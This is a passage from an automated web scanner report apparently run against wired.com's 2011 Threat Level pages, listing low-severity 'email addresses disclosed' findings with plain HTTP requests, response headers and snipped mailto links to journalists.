Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/2011/01/dubai-assassination/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /threatlevel/2011/01/dubai-assassination/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 07:01:21 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=335
Expires: Wed, 12 Jan 2011 15:33:00 GMT
Date: Wed, 12 Jan 2011 15:27:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 100303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.29. http://www.wired.com/threatlevel/2011/01/secret-tanning-camera/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/2011/01/secret-tanning-camera/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /threatlevel/2011/01/secret-tanning-camera/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 04:42:31 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=330
Expires: Wed, 12 Jan 2011 15:32:52 GMT
Date: Wed, 12 Jan 2011 15:27:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 80656

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.30. http://www.wired.com/threatlevel/2011/01/vf-wikieaks/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/2011/01/vf-wikieaks/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /threatlevel/2011/01/vf-wikieaks/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 12:50:43 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=378
Expires: Wed, 12 Jan 2011 15:33:32 GMT
Date: Wed, 12 Jan 2011 15:27:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 86522

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.31. http://www.wired.com/threatlevel/2011/01/video-poker/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/2011/01/video-poker/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /threatlevel/2011/01/video-poker/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 10:56:09 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=343
Expires: Wed, 12 Jan 2011 15:32:51 GMT
Date: Wed, 12 Jan 2011 15:27:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 91723

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.32. http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/2011/01/wikileaks-sunken-treasure/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /threatlevel/2011/01/wikileaks-sunken-treasure/ HTTP/1.1
Host: www.wired.com
Proxy-Connection: keep-alive
Referer: http://packetstormsecurity.org/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 04:49:47 +0000
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Cache-Control: must-revalidate, max-age=389
Expires: Wed, 12 Jan 2011 13:06:05 GMT
Date: Wed, 12 Jan 2011 12:59:36 GMT
Connection: close
Content-Length: 90454

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.33. http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/&hl=en&client=ca-pub-9817987453265044&adU=Verizon.com&adT=Verizon+Internet+-+%2419.99&adU=www.Brocade.com&adT=Ethernet+Fabrics&adU=www.Comcast.com&adT=Comcast%C2%AE+High+Speed&adU=www.google.com/nexus&adT=The+New+Google+Nexus+S&gl=US/x26usg/x3dAFQjCNGTF4DW2TDGEnchvTvU-Xc_zM5wgQ  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/2011/01/wikileaks-sunken-treasure/&hl=en&client=ca-pub-9817987453265044&adU=Verizon.com&adT=Verizon+Internet+-+%2419.99&adU=www.Brocade.com&adT=Ethernet+Fabrics&adU=www.Comcast.com&adT=Comcast%C2%AE+High+Speed&adU=www.google.com/nexus&adT=The+New+Google+Nexus+S&gl=US/x26usg/x3dAFQjCNGTF4DW2TDGEnchvTvU-Xc_zM5wgQ

Issue detail

The following email addresses were disclosed in the response:

Request

GET /threatlevel/2011/01/wikileaks-sunken-treasure/&hl=en&client=ca-pub-9817987453265044&adU=Verizon.com&adT=Verizon+Internet+-+%2419.99&adU=www.Brocade.com&adT=Ethernet+Fabrics&adU=www.Comcast.com&adT=Comcast%C2%AE+High+Speed&adU=www.google.com/nexus&adT=The+New+Google+Nexus+S&gl=US/x26usg/x3dAFQjCNGTF4DW2TDGEnchvTvU-Xc_zM5wgQ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:25:30 +0000
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate
Expires: Wed, 12 Jan 2011 15:27:06 GMT
Date: Wed, 12 Jan 2011 15:27:06 GMT
Content-Length: 56148
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.34. http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/&t=WikiLeaks%20Cables%20Cited%20in%20Lawsuit%20Over%20$500%20Million%20Sunken%20Treasure  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/2011/01/wikileaks-sunken-treasure/&t=WikiLeaks%20Cables%20Cited%20in%20Lawsuit%20Over%20$500%20Million%20Sunken%20Treasure

Issue detail

The following email addresses were disclosed in the response:

Request

GET /threatlevel/2011/01/wikileaks-sunken-treasure/&t=WikiLeaks%20Cables%20Cited%20in%20Lawsuit%20Over%20$500%20Million%20Sunken%20Treasure HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:25:29 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=386
Expires: Wed, 12 Jan 2011 15:33:29 GMT
Date: Wed, 12 Jan 2011 15:27:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 131139

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.35. http://www.wired.com/threatlevel/author/kimzetter/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/author/kimzetter/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /threatlevel/author/kimzetter/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 13:25:48 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=331
Expires: Wed, 12 Jan 2011 15:33:34 GMT
Date: Wed, 12 Jan 2011 15:28:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.36. http://www.wired.com/threatlevel/category/announcements/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/announcements/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /threatlevel/category/announcements/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:09:11 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=313
Expires: Wed, 12 Jan 2011 15:33:36 GMT
Date: Wed, 12 Jan 2011 15:28:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 132121

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.37. http://www.wired.com/threatlevel/category/atm-hacking/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/atm-hacking/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /threatlevel/category/atm-hacking/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 13:09:34 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=310
Expires: Wed, 12 Jan 2011 15:33:36 GMT
Date: Wed, 12 Jan 2011 15:28:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 92611

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.38. http://www.wired.com/threatlevel/category/bittorrent/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/bittorrent/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /threatlevel/category/bittorrent/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:09:17 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=308
Expires: Wed, 12 Jan 2011 15:33:37 GMT
Date: Wed, 12 Jan 2011 15:28:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 117216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.39. http://www.wired.com/threatlevel/category/black-hat-conference/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/black-hat-conference/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /threatlevel/category/black-hat-conference/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:09:21 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=302
Expires: Wed, 12 Jan 2011 15:33:37 GMT
Date: Wed, 12 Jan 2011 15:28:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 102800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.40. http://www.wired.com/threatlevel/category/bradley-manning/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/bradley-manning/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /threatlevel/category/bradley-manning/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:09:27 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=257
Expires: Wed, 12 Jan 2011 15:32:53 GMT
Date: Wed, 12 Jan 2011 15:28:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 137921

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
